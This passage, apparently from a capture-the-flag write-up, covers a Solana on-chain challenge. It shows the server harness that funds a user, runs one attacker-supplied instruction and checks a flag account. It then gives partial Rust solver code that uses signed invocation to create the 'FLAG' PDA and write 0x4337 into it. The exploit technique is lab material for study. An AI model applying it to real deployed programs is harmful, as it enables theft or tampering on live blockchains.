chall",{"type":25,"tag":216,"props":46010,"children":46011},{"style":6953},[46012],{"type":31,"value":7438},{"type":25,"tag":216,"props":46014,"children":46015},{"style":6964},[46016],{"type":31,"value":46017},"ID);\n",{"type":25,"tag":216,"props":46019,"children":46020},{"class":6922,"line":6778},[46021,46025,46029,46033,46037,46041,46045,46050,46054,46058,46062],{"type":25,"tag":216,"props":46022,"children":46023},{"style":6936},[46024],{"type":31,"value":15743},{"type":25,"tag":216,"props":46026,"children":46027},{"style":6936},[46028],{"type":31,"value":6944},{"type":25,"tag":216,"props":46030,"children":46031},{"style":6947},[46032],{"type":31,"value":46008},{"type":25,"tag":216,"props":46034,"children":46035},{"style":6953},[46036],{"type":31,"value":6956},{"type":25,"tag":216,"props":46038,"children":46039},{"style":6947},[46040],{"type":31,"value":45876},{"type":25,"tag":216,"props":46042,"children":46043},{"style":6953},[46044],{"type":31,"value":179},{"type":25,"tag":216,"props":46046,"children":46047},{"style":7047},[46048],{"type":31,"value":46049},"build",{"type":25,"tag":216,"props":46051,"children":46052},{"style":6964},[46053],{"type":31,"value":17836},{"type":25,"tag":216,"props":46055,"children":46056},{"style":6953},[46057],{"type":31,"value":179},{"type":25,"tag":216,"props":46059,"children":46060},{"style":6973},[46061],{"type":31,"value":36878},{"type":25,"tag":216,"props":46063,"children":46064},{"style":6964},[46065],{"type":31,"value":6967},{"type":25,"tag":6711,"props":46067,"children":46068},{"start":6769},[46069],{"type":25,"tag":2043,"props":46070,"children":46071},{},[46072],{"type":31,"value":46073},"Funds the user account with 100 SOL",{"type":25,"tag":206,"props":46075,"children":46077},{"className":6915,"code":46076,"language":6914,"meta":7,"style":7},"let user_keypair = Keypair::new();\nlet user = user_keypair.pubkey();\n\nlet payer_keypair = &chall.ctx.payer;\nlet payer = payer_keypair.pubkey();\n\nchall\n    .run_ix(system_instruction::transfer(&payer, &user, 100_000_000_000))\n    .await?;\n\nwriteln!(socket, \"user: {}\", user)?;\n",[46078],{"type":25,"tag":82,"props":46079,"children":46080},{"__ignoreMap":7},[46081,46114,46146,46153,46195,46227,46234,46242,46306,46325,46332],{"type":25,"tag":216,"props":46082,"children":46083},{"class":6922,"line":6923},[46084,46088,46093,46097,46102,46106,46110],{"type":25,"tag":216,"props":46085,"children":46086},{"style":6936},[46087],{"type":31,"value":15743},{"type":25,"tag":216,"props":46089,"children":46090},{"style":6947},[46091],{"type":31,"value":46092}," user_keypair",{"type":25,"tag":216,"props":46094,"children":46095},{"style":6953},[46096],{"type":31,"value":6956},{"type":25,"tag":216,"props":46098,"children":46099},{"style":7375},[46100],{"type":31,"value":46101}," Keypair",{"type":25,"tag":216,"props":46103,"children":46104},{"style":6953},[46105],{"type":31,"value":7438},{"type":25,"tag":216,"props":46107,"children":46108},{"style":7047},[46109],{"type":31,"value":19080},{"type":25,"tag":216,"props":46111,"children":46112},{"style":6964},[46113],{"type":31,"value":7633},{"type":25,"tag":216,"props":46115,"children":46116},{"class":6922,"line":6769},[46117,46121,46126,46130,46134,46138,46142],{"type":25,"tag":216,"props":46118,"children":46119},{"style":6936},[46120],{"type":31,"value":15743},{"type":25,"tag":216,"props":46122,"children":46123},{"style":6947},[46124],{"type":31,"value":46125}," user",{"type":25,"tag":216,"props":46127,"children":46128},{"style":6953},[46129],{"type":31,"value":6956},{"type":25,"tag":216,"props":46131,"children":46132},{"style":6947},[46133],{"type":31,"value":46092},{"type":25,"tag":216,"props":46135,"children":46136},{"style":6953},[46137],{"type":31,"value":179},{"type":25,"tag":216,"props":46139,"children":46140},{"style":7047},[46141],{"type":31,"value":7502},{"type":25,"tag":216,"props":46143,"children":46144},{"style":6964},[46145],{"type":31,"value":7633},{"type":25,"tag":216,"props":46147,"children":46148},{"class":6922,"line":6778},[46149],{"type":25,"tag":216,"props":46150,"children":46151},{"emptyLinePlaceholder":16},[46152],{"type":31,"value":7642},{"type":25,"tag":216,"props":46154,"children":46155},{"class":6922,"line":7005},[46156,46160,46165,46169,46173,46178,46182,46186,46190],{"type":25,"tag":216,"props":46157,"children":46158},{"style":6936},[46159],{"type":31,"value":15743},{"type":25,"tag":216,"props":46161,"children":46162},{"style":6947},[46163],{"type":31,"value":46164}," payer_keypair",{"type":25,"tag":216,"props":46166,"children":46167},{"style":6953},[46168],{"type":31,"value":6956},{"type":25,"tag":216,"props":46170,"children":46171},{"style":6953},[46172],{"type":31,"value":11093},{"type":25,"tag":216,"props":46174,"children":46175},{"style":6947},[46176],{"type":31,"value":46177},"chall",{"type":25,"tag":216,"props":46179,"children":46180},{"style":6953},[46181],{"type":31,"value":179},{"type":25,"tag":216,"props":46183,"children":46184},{"style":6964},[46185],{"type":31,"value":24240},{"type":25,"tag":216,"props":46187,"children":46188},{"style":6953},[46189],{"type":31,"value":179},{"type":25,"tag":216,"props":46191,"children":46192},{"style":6964},[46193],{"type":31,"value":46194},"payer;\n",{"type":25,"tag":216,"props":46196,"children":46197},{"class":6922,"line":7110},[46198,46202,46207,46211,46215,46219,46223],{"type":25,"tag":216,"props":46199,"children":46200},{"style":6936},[46201],{"type":31,"value":15743},{"type":25,"tag":216,"props":46203,"children":46204},{"style":6947},[46205],{"type":31,"value":46206}," payer",{"type":25,"tag":216,"props":46208,"children":46209},{"style":6953},[46210],{"type":31,"value":6956},{"type":25,"tag":216,"props":46212,"children":46213},{"style":6947},[46214],{"type":31,"value":46164},{"type":25,"tag":216,"props":46216,"children":46217},{"style":6953},[46218],{"type":31,"value":179},{"type":25,"tag":216,"props":46220,"children":46221},{"style":7047},[46222],{"type":31,"value":7502},{"type":25,"tag":216,"props":46224,"children":46225},{"style":6964},[46226],{"type":31,"value":7633},{"type":25,"tag":216,"props":46228,"children":46229},{"class":6922,"line":7216},[46230],{"type":25,"tag":216,"props":46231,"children":46232},{"emptyLinePlaceholder":16},[46233],{"type":31,"value":7642},{"type":25,"tag":216,"props":46235,"children":46236},{"class":6922,"line":7244},[46237],{"type":25,"tag":216,"props":46238,"children":46239},{"style":6947},[46240],{"type":31,"value":46241},"chall\n",{"type":25,"tag":216,"props":46243,"children":46244},{"class":6922,"line":7257},[46245,46250,46255,46260,46264,46268,46272,46276,46281,46285,46289,46293,46297,46302],{"type":25,"tag":216,"props":46246,"children":46247},{"style":6953},[46248],{"type":31,"value":46249},"    .",{"type":25,"tag":216,"props":46251,"children":46252},{"style":7047},[46253],{"type":31,"value":46254},"run_ix",{"type":25,"tag":216,"props":46256,"children":46257},{"style":6964},[46258],{"type":31,"value":46259},"(system_instruction",{"type":25,"tag":216,"props":46261,"children":46262},{"style":6953},[46263],{"type":31,"value":7438},{"type":25,"tag":216,"props":46265,"children":46266},{"style":7047},[46267],{"type":31,"value":36085},{"type":25,"tag":216,"props":46269,"children":46270},{"style":6964},[46271],{"type":31,"value":1850},{"type":25,"tag":216,"props":46273,"children":46274},{"style":6953},[46275],{"type":31,"value":7059},{"type":25,"tag":216,"props":46277,"children":46278},{"style":6947},[46279],{"type":31,"value":46280},"payer",{"type":25,"tag":216,"props":46282,"children":46283},{"style":6964},[46284],{"type":31,"value":7026},{"type":25,"tag":216,"props":46286,"children":46287},{"style":6953},[46288],{"type":31,"value":7059},{"type":25,"tag":216,"props":46290,"children":46291},{"style":6947},[46292],{"type":31,"value":24192},{"type":25,"tag":216,"props":46294,"children":46295},{"style":6964},[46296],{"type":31,"value":7026},{"type":25,"tag":216,"props":46298,"children":46299},{"style":6989},[46300],{"type":31,"value":46301},"100_000_000_000",{"type":25,"tag":216,"props":46303,"children":46304},{"style":6964},[46305],{"type":31,"value":23672},{"type":25,"tag":216,"props":46307,"children":46308},{"class":6922,"line":7275},[46309,46313,46317,46321],{"type":25,"tag":216,"props":46310,"children":46311},{"style":6953},[46312],{"type":31,"value":46249},{"type":25,"tag":216,"props":46314,"children":46315},{"style":6973},[46316],{"type":31,"value":36878},{"type":25,"tag":216,"props":46318,"children":46319},{"style":6953},[46320],{"type":31,"value":604},{"type":25,"tag":216,"props":46322,"children":46323},{"style":6964},[46324],{"type":31,"value":6967},{"type":25,"tag":216,"props":46326,"children":46327},{"class":6922,"line":7296},[46328],{"type":25,"tag":216,"props":46329,"children":46330},{"emptyLinePlaceholder":16},[46331],{"type":31,"value":7642},{"type":25,"tag":216,"props":46333,"children":46334},{"class":6922,"line":7305},[46335,46340,46344,46348,46352,46357,46361,46365,46369,46373],{"type":25,"tag":216,"props":46336,"children":46337},{"style":7047},[46338],{"type":31,"value":46339},"writeln!",{"type":25,"tag":216,"props":46341,"children":46342},{"style":6964},[46343],{"type":31,"value":1850},{"type":25,"tag":216,"props":46345,"children":46346},{"style":6947},[46347],{"type":31,"value":45903},{"type":25,"tag":216,"props":46349,"children":46350},{"style":6964},[46351],{"type":31,"value":7026},{"type":25,"tag":216,"props":46353,"children":46354},{"style":8205},[46355],{"type":31,"value":46356},"\"user: {}\"",{"type":25,"tag":216,"props":46358,"children":46359},{"style":6964},[46360],{"type":31,"value":7026},{"type":25,"tag":216,"props":46362,"children":46363},{"style":6947},[46364],{"type":31,"value":24192},{"type":25,"tag":216,"props":46366,"children":46367},{"style":6964},[46368],{"type":31,"value":1888},{"type":25,"tag":216,"props":46370,"children":46371},{"style":6953},[46372],{"type":31,"value":604},{"type":25,"tag":216,"props":46374,"children":46375},{"style":6964},[46376],{"type":31,"value":6967},{"type":25,"tag":6711,"props":46378,"children":46379},{"start":6778},[46380],{"type":25,"tag":2043,"props":46381,"children":46382},{},[46383],{"type":31,"value":46384},"Reads an instruction from the tcp stream and executes it",{"type":25,"tag":206,"props":46386,"children":46388},{"className":6915,"code":46387,"language":6914,"meta":7,"style":7},"let solve_ix = chall.read_instruction(chall::ID)?;\nchall.run_ixs_full(&[solve_ix], &[&user_keypair], &user).await?;\n",[46389],{"type":25,"tag":82,"props":46390,"children":46391},{"__ignoreMap":7},[46392,46442],{"type":25,"tag":216,"props":46393,"children":46394},{"class":6922,"line":6923},[46395,46399,46404,46408,46412,46416,46421,46425,46429,46434,46438],{"type":25,"tag":216,"props":46396,"children":46397},{"style":6936},[46398],{"type":31,"value":15743},{"type":25,"tag":216,"props":46400,"children":46401},{"style":6947},[46402],{"type":31,"value":46403}," solve_ix",{"type":25,"tag":216,"props":46405,"children":46406},{"style":6953},[46407],{"type":31,"value":6956},{"type":25,"tag":216,"props":46409,"children":46410},{"style":6947},[46411],{"type":31,"value":46008},{"type":25,"tag":216,"props":46413,"children":46414},{"style":6953},[46415],{"type":31,"value":179},{"type":25,"tag":216,"props":46417,"children":46418},{"style":7047},[46419],{"type":31,"value":46420},"read_instruction",{"type":25,"tag":216,"props":46422,"children":46423},{"style":6964},[46424],{"type":31,"value":45990},{"type":25,"tag":216,"props":46426,"children":46427},{"style":6953},[46428],{"type":31,"value":7438},{"type":25,"tag":216,"props":46430,"children":46431},{"style":6964},[46432],{"type":31,"value":46433},"ID)",{"type":25,"tag":216,"props":46435,"children":46436},{"style":6953},[46437],{"type":31,"value":604},{"type":25,"tag":216,"props":46439,"children":46440},{"style":6964},[46441],{"type":31,"value":6967},{"type":25,"tag":216,"props":46443,"children":46444},{"class":6922,"line":6769},[46445,46449,46453,46458,46462,46466,46470,46475,46479,46483,46487,46491,46496,46500,46504,46508,46512,46516,46520,46524],{"type":25,"tag":216,"props":46446,"children":46447},{"style":6947},[46448],{"type":31,"value":46177},{"type":25,"tag":216,"props":46450,"children":46451},{"style":6953},[46452],{"type":31,"value":179},{"type":25,"tag":216,"props":46454,"children":46455},{"style":7047},[46456],{"type":31,"value":46457},"run_ixs_full",{"type":25,"tag":216,"props":46459,"children":46460},{"style":6964},[46461],{"type":31,"value":1850},{"type":25,"tag":216,"props":46463,"children":46464},{"style":6953},[46465],{"type":31,"value":7059},{"type":25,"tag":216,"props":46467,"children":46468},{"style":6964},[46469],{"type":31,"value":7701},{"type":25,"tag":216,"props":46471,"children":46472},{"style":6947},[46473],{"type":31,"value":46474},"solve_ix",{"type":25,"tag":216,"props":46476,"children":46477},{"style":6964},[46478],{"type":31,"value":27006},{"type":25,"tag":216,"props":46480,"children":46481},{"style":6953},[46482],{"type":31,"value":7059},{"type":25,"tag":216,"props":46484,"children":46485},{"style":6964},[46486],{"type":31,"value":7701},{"type":25,"tag":216,"props":46488,"children":46489},{"style":6953},[46490],{"type":31,"value":7059},{"type":25,"tag":216,"props":46492,"children":46493},{"style":6947},[46494],{"type":31,"value":46495},"user_keypair",{"type":25,"tag":216,"props":46497,"children":46498},{"style":6964},[46499],{"type":31,"value":27006},{"type":25,"tag":216,"props":46501,"children":46502},{"style":6953},[46503],{"type":31,"value":7059},{"type":25,"tag":216,"props":46505,"children":46506},{"style":6947},[46507],{"type":31,"value":24192},{"type":25,"tag":216,"props":46509,"children":46510},{"style":6964},[46511],{"type":31,"value":1888},{"type":25,"tag":216,"props":46513,"children":46514},{"style":6953},[46515],{"type":31,"value":179},{"type":25,"tag":216,"props":46517,"children":46518},{"style":6973},[46519],{"type":31,"value":36878},{"type":25,"tag":216,"props":46521,"children":46522},{"style":6953},[46523],{"type":31,"value":604},{"type":25,"tag":216,"props":46525,"children":46526},{"style":6964},[46527],{"type":31,"value":6967},{"type":25,"tag":6711,"props":46529,"children":46530},{"start":7005},[46531],{"type":25,"tag":2043,"props":46532,"children":46533},{},[46534],{"type":31,"value":46535},"Checks that the account at PDA(\"FLAG\") exists, has a data length of 0x1337 and the first 8 bytes are equal to 0x4337. If so, it prints the flag.",{"type":25,"tag":206,"props":46537,"children":46539},{"className":6915,"code":46538,"language":6914,"meta":7,"style":7},"let flag = Pubkey::create_program_address(&[\"FLAG\".as_ref()], &chall::ID)?;\nif let Some(acct) = chall.ctx.banks_client.get_account(flag).await? {\n    if acct.data.len() == 0x1337\n        && u64::from_le_bytes(acct.data[..8].try_into().unwrap()) == 0x4337\n    {\n        writeln!(socket, \"congrats!\")?;\n        if let Ok(flag) = env::var(\"FLAG\") {\n            writeln!(socket, \"flag: {:?}\", flag)?;\n        } else {\n            writeln!(socket, \"flag not found, please contact admin\")?;\n        }\n    }\n}\n",[46540],{"type":25,"tag":82,"props":46541,"children":46542},{"__ignoreMap":7},[46543,46627,46718,46759,46843,46850,46887,46944,46989,47004,47040,47047,47054],{"type":25,"tag":216,"props":46544,"children":46545},{"class":6922,"line":6923},[46546,46550,46555,46559,46563,46567,46572,46576,46580,46584,46589,46593,46598,46603,46607,46611,46615,46619,46623],{"type":25,"tag":216,"props":46547,"children":46548},{"style":6936},[46549],{"type":31,"value":15743},{"type":25,"tag":216,"props":46551,"children":46552},{"style":6947},[46553],{"type":31,"value":46554}," flag",{"type":25,"tag":216,"props":46556,"children":46557},{"style":6953},[46558],{"type":31,"value":6956},{"type":25,"tag":216,"props":46560,"children":46561},{"style":7375},[46562],{"type":31,"value":24817},{"type":25,"tag":216,"props":46564,"children":46565},{"style":6953},[46566],{"type":31,"value":7438},{"type":25,"tag":216,"props":46568,"children":46569},{"style":7047},[46570],{"type":31,"value":46571},"create_program_address",{"type":25,"tag":216,"props":46573,"children":46574},{"style":6964},[46575],{"type":31,"value":1850},{"type":25,"tag":216,"props":46577,"children":46578},{"style":6953},[46579],{"type":31,"value":7059},{"type":25,"tag":216,"props":46581,"children":46582},{"style":6964},[46583],{"type":31,"value":7701},{"type":25,"tag":216,"props":46585,"children":46586},{"style":8205},[46587],{"type":31,"value":46588},"\"FLAG\"",{"type":25,"tag":216,"props":46590,"children":46591},{"style":6953},[46592],{"type":31,"value":179},{"type":25,"tag":216,"props":46594,"children":46595},{"style":7047},[46596],{"type":31,"value":46597},"as_ref",{"type":25,"tag":216,"props":46599,"children":46600},{"style":6964},[46601],{"type":31,"value":46602},"()], ",{"type":25,"tag":216,"props":46604,"children":46605},{"style":6953},[46606],{"type":31,"value":7059},{"type":25,"tag":216,"props":46608,"children":46609},{"style":6964},[46610],{"type":31,"value":46177},{"type":25,"tag":216,"props":46612,"children":46613},{"style":6953},[46614],{"type":31,"value":7438},{"type":25,"tag":216,"props":46616,"children":46617},{"style":6964},[46618],{"type":31,"value":46433},{"type":25,"tag":216,"props":46620,"children":46621},{"style":6953},[46622],{"type":31,"value":604},{"type":25,"tag":216,"props":46624,"children":46625},{"style":6964},[46626],{"type":31,"value":6967},{"type":25,"tag":216,"props":46628,"children":46629},{"class":6922,"line":6769},[46630,46634,46638,46642,46646,46651,46655,46659,46663,46667,46671,46675,46680,46684,46689,46693,46698,46702,46706,46710,46714],{"type":25,"tag":216,"props":46631,"children":46632},{"style":6973},[46633],{"type":31,"value":19537},{"type":25,"tag":216,"props":46635,"children":46636},{"style":6936},[46637],{"type":31,"value":31263},{"type":25,"tag":216,"props":46639,"children":46640},{"style":7375},[46641],{"type":31,"value":31268},{"type":25,"tag":216,"props":46643,"children":46644},{"style":6964},[46645],{"type":31,"value":1850},{"type":25,"tag":216,"props":46647,"children":46648},{"style":6947},[46649],{"type":31,"value":46650},"acct",{"type":25,"tag":216,"props":46652,"children":46653},{"style":6964},[46654],{"type":31,"value":7036},{"type":25,"tag":216,"props":46656,"children":46657},{"style":6953},[46658],{"type":31,"value":266},{"type":25,"tag":216,"props":46660,"children":46661},{"style":6947},[46662],{"type":31,"value":46008},{"type":25,"tag":216,"props":46664,"children":46665},{"style":6953},[46666],{"type":31,"value":179},{"type":25,"tag":216,"props":46668,"children":46669},{"style":6964},[46670],{"type":31,"value":24240},{"type":25,"tag":216,"props":46672,"children":46673},{"style":6953},[46674],{"type":31,"value":179},{"type":25,"tag":216,"props":46676,"children":46677},{"style":6964},[46678],{"type":31,"value":46679},"banks_client",{"type":25,"tag":216,"props":46681,"children":46682},{"style":6953},[46683],{"type":31,"value":179},{"type":25,"tag":216,"props":46685,"children":46686},{"style":7047},[46687],{"type":31,"value":46688},"get_account",{"type":25,"tag":216,"props":46690,"children":46691},{"style":6964},[46692],{"type":31,"value":1850},{"type":25,"tag":216,"props":46694,"children":46695},{"style":6947},[46696],{"type":31,"value":46697},"flag",{"type":25,"tag":216,"props":46699,"children":46700},{"style":6964},[46701],{"type":31,"value":1888},{"type":25,"tag":216,"props":46703,"children":46704},{"style":6953},[46705],{"type":31,"value":179},{"type":25,"tag":216,"props":46707,"children":46708},{"style":6973},[46709],{"type":31,"value":36878},{"type":25,"tag":216,"props":46711,"children":46712},{"style":6953},[46713],{"type":31,"value":604},{"type":25,"tag":216,"props":46715,"children":46716},{"style":6964},[46717],{"type":31,"value":7241},{"type":25,"tag":216,"props":46719,"children":46720},{"class":6922,"line":6778},[46721,46725,46730,46734,46738,46742,46746,46750,46754],{"type":25,"tag":216,"props":46722,"children":46723},{"style":6973},[46724],{"type":31,"value":16235},{"type":25,"tag":216,"props":46726,"children":46727},{"style":6947},[46728],{"type":31,"value":46729}," acct",{"type":25,"tag":216,"props":46731,"children":46732},{"style":6953},[46733],{"type":31,"value":179},{"type":25,"tag":216,"props":46735,"children":46736},{"style":6964},[46737],{"type":31,"value":7669},{"type":25,"tag":216,"props":46739,"children":46740},{"style":6953},[46741],{"type":31,"value":179},{"type":25,"tag":216,"props":46743,"children":46744},{"style":7047},[46745],{"type":31,"value":13094},{"type":25,"tag":216,"props":46747,"children":46748},{"style":6964},[46749],{"type":31,"value":18000},{"type":25,"tag":216,"props":46751,"children":46752},{"style":6953},[46753],{"type":31,"value":12528},{"type":25,"tag":216,"props":46755,"children":46756},{"style":6989},[46757],{"type":31,"value":46758}," 0x1337\n",{"type":25,"tag":216,"props":46760,"children":46761},{"class":6922,"line":7005},[46762,46767,46771,46775,46780,46784,46788,46792,46797,46801,46805,46809,46813,46817,46821,46825,46829,46834,46838],{"type":25,"tag":216,"props":46763,"children":46764},{"style":6953},[46765],{"type":31,"value":46766},"        &&",{"type":25,"tag":216,"props":46768,"children":46769},{"style":7375},[46770],{"type":31,"value":9811},{"type":25,"tag":216,"props":46772,"children":46773},{"style":6953},[46774],{"type":31,"value":7438},{"type":25,"tag":216,"props":46776,"children":46777},{"style":7047},[46778],{"type":31,"value":46779},"from_le_bytes",{"type":25,"tag":216,"props":46781,"children":46782},{"style":6964},[46783],{"type":31,"value":1850},{"type":25,"tag":216,"props":46785,"children":46786},{"style":6947},[46787],{"type":31,"value":46650},{"type":25,"tag":216,"props":46789,"children":46790},{"style":6953},[46791],{"type":31,"value":179},{"type":25,"tag":216,"props":46793,"children":46794},{"style":6964},[46795],{"type":31,"value":46796},"data[",{"type":25,"tag":216,"props":46798,"children":46799},{"style":6953},[46800],{"type":31,"value":6997},{"type":25,"tag":216,"props":46802,"children":46803},{"style":6989},[46804],{"type":31,"value":8031},{"type":25,"tag":216,"props":46806,"children":46807},{"style":6964},[46808],{"type":31,"value":19368},{"type":25,"tag":216,"props":46810,"children":46811},{"style":6953},[46812],{"type":31,"value":179},{"type":25,"tag":216,"props":46814,"children":46815},{"style":7047},[46816],{"type":31,"value":30120},{"type":25,"tag":216,"props":46818,"children":46819},{"style":6964},[46820],{"type":31,"value":17836},{"type":25,"tag":216,"props":46822,"children":46823},{"style":6953},[46824],{"type":31,"value":179},{"type":25,"tag":216,"props":46826,"children":46827},{"style":7047},[46828],{"type":31,"value":7628},{"type":25,"tag":216,"props":46830,"children":46831},{"style":6964},[46832],{"type":31,"value":46833},"()) ",{"type":25,"tag":216,"props":46835,"children":46836},{"style":6953},[46837],{"type":31,"value":12528},{"type":25,"tag":216,"props":46839,"children":46840},{"style":6989},[46841],{"type":31,"value":46842}," 0x4337\n",{"type":25,"tag":216,"props":46844,"children":46845},{"class":6922,"line":7110},[46846],{"type":25,"tag":216,"props":46847,"children":46848},{"style":6964},[46849],{"type":31,"value":33147},{"type":25,"tag":216,"props":46851,"children":46852},{"class":6922,"line":7216},[46853,46858,46862,46866,46870,46875,46879,46883],{"type":25,"tag":216,"props":46854,"children":46855},{"style":7047},[46856],{"type":31,"value":46857},"        writeln!",{"type":25,"tag":216,"props":46859,"children":46860},{"style":6964},[46861],{"type":31,"value":1850},{"type":25,"tag":216,"props":46863,"children":46864},{"style":6947},[46865],{"type":31,"value":45903},{"type":25,"tag":216,"props":46867,"children":46868},{"style":6964},[46869],{"type":31,"value":7026},{"type":25,"tag":216,"props":46871,"children":46872},{"style":8205},[46873],{"type":31,"value":46874},"\"congrats!\"",{"type":25,"tag":216,"props":46876,"children":46877},{"style":6964},[46878],{"type":31,"value":1888},{"type":25,"tag":216,"props":46880,"children":46881},{"style":6953},[46882],{"type":31,"value":604},{"type":25,"tag":216,"props":46884,"children":46885},{"style":6964},[46886],{"type":31,"value":6967},{"type":25,"tag":216,"props":46888,"children":46889},{"class":6922,"line":7244},[46890,46894,46898,46903,46907,46911,46915,46919,46924,46928,46932,46936,46940],{"type":25,"tag":216,"props":46891,"children":46892},{"style":6973},[46893],{"type":31,"value":7222},{"type":25,"tag":216,"props":46895,"children":46896},{"style":6936},[46897],{"type":31,"value":31263},{"type":25,"tag":216,"props":46899,"children":46900},{"style":7375},[46901],{"type":31,"value":46902}," Ok",{"type":25,"tag":216,"props":46904,"children":46905},{"style":6964},[46906],{"type":31,"value":1850},{"type":25,"tag":216,"props":46908,"children":46909},{"style":6947},[46910],{"type":31,"value":46697},{"type":25,"tag":216,"props":46912,"children":46913},{"style":6964},[46914],{"type":31,"value":7036},{"type":25,"tag":216,"props":46916,"children":46917},{"style":6953},[46918],{"type":31,"value":266},{"type":25,"tag":216,"props":46920,"children":46921},{"style":6964},[46922],{"type":31,"value":46923}," env",{"type":25,"tag":216,"props":46925,"children":46926},{"style":6953},[46927],{"type":31,"value":7438},{"type":25,"tag":216,"props":46929,"children":46930},{"style":7047},[46931],{"type":31,"value":39010},{"type":25,"tag":216,"props":46933,"children":46934},{"style":6964},[46935],{"type":31,"value":1850},{"type":25,"tag":216,"props":46937,"children":46938},{"style":8205},[46939],{"type":31,"value":46588},{"type":25,"tag":216,"props":46941,"children":46942},{"style":6964},[46943],{"type":31,"value":18761},{"type":25,"tag":216,"props":46945,"children":46946},{"class":6922,"line":7257},[46947,46952,46956,46960,46964,46969,46973,46977,46981,46985],{"type":25,"tag":216,"props":46948,"children":46949},{"style":7047},[46950],{"type":31,"value":46951},"            writeln!",{"type":25,"tag":216,"props":46953,"children":46954},{"style":6964},[46955],{"type":31,"value":1850},{"type":25,"tag":216,"props":46957,"children":46958},{"style":6947},[46959],{"type":31,"value":45903},{"type":25,"tag":216,"props":46961,"children":46962},{"style":6964},[46963],{"type":31,"value":7026},{"type":25,"tag":216,"props":46965,"children":46966},{"style":8205},[46967],{"type":31,"value":46968},"\"flag: {:?}\"",{"type":25,"tag":216,"props":46970,"children":46971},{"style":6964},[46972],{"type":31,"value":7026},{"type":25,"tag":216,"props":46974,"children":46975},{"style":6947},[46976],{"type":31,"value":46697},{"type":25,"tag":216,"props":46978,"children":46979},{"style":6964},[46980],{"type":31,"value":1888},{"type":25,"tag":216,"props":46982,"children":46983},{"style":6953},[46984],{"type":31,"value":604},{"type":25,"tag":216,"props":46986,"children":46987},{"style":6964},[46988],{"type":31,"value":6967},{"type":25,"tag":216,"props":46990,"children":46991},{"class":6922,"line":7275},[46992,46996,47000],{"type":25,"tag":216,"props":46993,"children":46994},{"style":6964},[46995],{"type":31,"value":7263},{"type":25,"tag":216,"props":46997,"children":46998},{"style":6973},[46999],{"type":31,"value":7268},{"type":25,"tag":216,"props":47001,"children":47002},{"style":6964},[47003],{"type":31,"value":7241},{"type":25,"tag":216,"props":47005,"children":47006},{"class":6922,"line":7296},[47007,47011,47015,47019,47023,47028,47032,47036],{"type":25,"tag":216,"props":47008,"children":47009},{"style":7047},[47010],{"type":31,"value":46951},{"type":25,"tag":216,"props":47012,"children":47013},{"style":6964},[47014],{"type":31,"value":1850},{"type":25,"tag":216,"props":47016,"children":47017},{"style":6947},[47018],{"type":31,"value":45903},{"type":25,"tag":216,"props":47020,"children":47021},{"style":6964},[47022],{"type":31,"value":7026},{"type":25,"tag":216,"props":47024,"children":47025},{"style":8205},[47026],{"type":31,"value":47027},"\"flag not found, please contact admin\"",{"type":25,"tag":216,"props":47029,"children":47030},{"style":6964},[47031],{"type":31,"value":1888},{"type":25,"tag":216,"props":47033,"children":47034},{"style":6953},[47035],{"type":31,"value":604},{"type":25,"tag":216,"props":47037,"children":47038},{"style":6964},[47039],{"type":31,"value":6967},{"type":25,"tag":216,"props":47041,"children":47042},{"class":6922,"line":7305},[47043],{"type":25,"tag":216,"props":47044,"children":47045},{"style":6964},[47046],{"type":31,"value":7302},{"type":25,"tag":216,"props":47048,"children":47049},{"class":6922,"line":7557},[47050],{"type":25,"tag":216,"props":47051,"children":47052},{"style":6964},[47053],{"type":31,"value":7311},{"type":25,"tag":216,"props":47055,"children":47056},{"class":6922,"line":7574},[47057],{"type":25,"tag":216,"props":47058,"children":47059},{"style":6964},[47060],{"type":31,"value":7874},{"type":25,"tag":26,"props":47062,"children":47064},{"id":47063},"solution-idea",[47065],{"type":31,"value":47066},"Solution Idea",{"type":25,"tag":38,"props":47068,"children":47069},{},[47070,47072,47077],{"type":31,"value":47071},"You may think it's impossible to do with just one instruction, but we can actually leverage the ",{"type":25,"tag":82,"props":47073,"children":47075},{"className":47074},[],[47076],{"type":31,"value":39644},{"type":31,"value":47078}," function to execute infinite instructions. Well -- not entirely infinite, as we are limited by the amount of data we can pass to the on-chain program, and by the maximum stack depth of the Solana VM -- but we can execute up to 64 instructions, which is more than enough to get the flag.",{"type":25,"tag":38,"props":47080,"children":47081},{},[47082,47084,47090],{"type":31,"value":47083},"In order to get the flag, we need to make sure that the account at ",{"type":25,"tag":82,"props":47085,"children":47087},{"className":47086},[],[47088],{"type":31,"value":47089},"PDA(\"FLAG\")",{"type":31,"value":47091}," exists, has a data length of 0x1337, and the first 8 bytes are equal to 0x4337.",{"type":25,"tag":38,"props":47093,"children":47094},{},[47095,47097,47104],{"type":31,"value":47096},"Essentially, we need to ",{"type":25,"tag":162,"props":47098,"children":47101},{"href":47099,"rel":47100},"https://docs.solana.com/developing/runtime-facilities/programs#system-program",[166],[47102],{"type":31,"value":47103},"invoke the System Program",{"type":31,"value":47105},", and write controlled data into the newly created account.",{"type":25,"tag":38,"props":47107,"children":47108},{},[47109],{"type":31,"value":47110},"A sample program that does this is as follows:",{"type":25,"tag":206,"props":47112,"children":47114},{"className":6915,"code":47113,"language":6914,"meta":7,"style":7},"pub fn process_instruction(\n    program_id: &Pubkey,\n    accounts: &[AccountInfo],\n    data: &[u8]\n) -> ProgramResult {\n    let flag_pda_ai = &accounts[0];\n    let user_ai = &accounts[1];\n\n    // Step 1: Create a new account with 0x1337 bytes of data\n    let instruction = Instruction::new_with_bincode(\n        system_program::ID,\n        &SystemInstruction::CreateAccount {\n            space: 0x1337,\n            lamports: Rent::default().minimum_balance(0x1337),\n            owner: chall::ID\n        },\n        vec![\n            AccountMeta::new(*user_ai.key, true),\n            AccountMeta::new(*flag_pda_ai.key, true),\n        ],\n    );\n    invoke_signed_unchecked(\n        &instruction,\n        &[\n            user_ai.clone(),\n            flag_pda_ai.clone(),\n        ],\n        &[&[\"FLAG\".as_ref()]],\n    )?;\n\n    // Step 2: Write 0x4337 to the first 8 bytes of the account\n    flag_pda_ai.try_borrow_mut_data()?[..8].copy_from_slice(&0x4337u64.to_le_bytes());\n\n    